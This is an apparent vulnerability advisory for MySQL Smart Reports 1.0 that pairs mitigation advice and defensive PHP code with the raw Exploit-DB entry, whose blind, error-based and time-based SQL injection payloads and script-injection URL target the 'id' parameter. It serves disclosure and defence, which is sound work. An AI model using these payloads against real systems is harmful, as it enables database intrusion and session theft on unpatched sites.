Vendor: MySQL Smart Reports
By: Özkan Mustafa Akkus (AkkuS)
CVSS: 5.5 (MEDIUM)
Type: SQL Injection / Cross-Site Scripting
CWE: 89
Product Name: MySQL Smart Reports
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
CPE: mysql_smart_reports
Platforms Tested: Kali linux
Year: 2018

MySQL Smart Reports 1.0 – SQL Injection / Cross-Site Scripting

MySQL Smart Reports 1.0 is vulnerable to SQL injection and cross-site scripting. An attacker can use the 'id' parameter of system-settings-user-edit2.php to inject SQL queries or script code.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in SQL queries or displaying it in web pages. Use prepared statements or parameterized queries to prevent SQL Injection. Implement input validation and output encoding to prevent Cross-Site Scripting.
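
One way to apply this mitigation to a request parameter like 'id', as an added example that is not the vendor's code and not part of the original advisory. Table, column and function names are hypothetical, an in-memory SQLite database stands in for MySQL so the script runs offline, and the script-context output is an assumption about where the value is reflected.

```php
<?php
// Added example, not MySQL Smart Reports code. Table, column and function
// names are hypothetical; in-memory SQLite stands in for MySQL.
declare(strict_types=1);

function parseId(mixed $raw): ?int
{
    // Allow-list: the id must be a positive integer, nothing else.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function findUser(PDO $db, int $id): ?array
{
    // The value is bound as data and never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function renderUser(array $user): string
{
    // HTML context: entity-encode. Script context: JSON with <, >, &, ' and "
    // hex-escaped so a value cannot close the <script> element or a string.
    $html = htmlspecialchars((string) $user['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $js = json_encode($user, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
    return "<p>Editing {$html}</p>\n<script>var user = {$js};</script>\n";
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
// Constructed sample row whose stored value contains markup.
$db->prepare('INSERT INTO users (id, name) VALUES (?, ?)')->execute([1, '</script><b>admin</b>']);

// Sample inputs: one valid id, then two values shaped like the advisory's PoC.
foreach (['1', "9' AND SLEEP(5)-- x", "'</script><script>alert(1)</script>"] as $raw) {
    $id = parseId($raw);
    if ($id === null) {
        echo "400 Bad Request: id must be a positive integer\n";
        continue;
    }
    $user = findUser($db, $id);
    echo $user === null ? "404 Not Found\n" : renderUser($user);
}
```

The stored name in the valid case is emitted entity-encoded in the paragraph and hex-escaped inside the script block, so output encoding holds even when the data itself contains markup.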

Exploit-DB raw data:

# Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : It is actually a post request sent by the user to update.
                You do not need to use post data. You can inject as with the GET method.
====================================================

# PoC : SQLi :

Parameter : id

     Type : boolean-based blind
     Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE 0x28 END))-- YVFC

     Type : error-based
     Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo

     Type : AND/OR time-based blind
     Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' AND SLEEP(5)-- mcFO


====================================================
# PoC : XSS :

  Payload :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id='
</script><script>alert(1)</script>‘;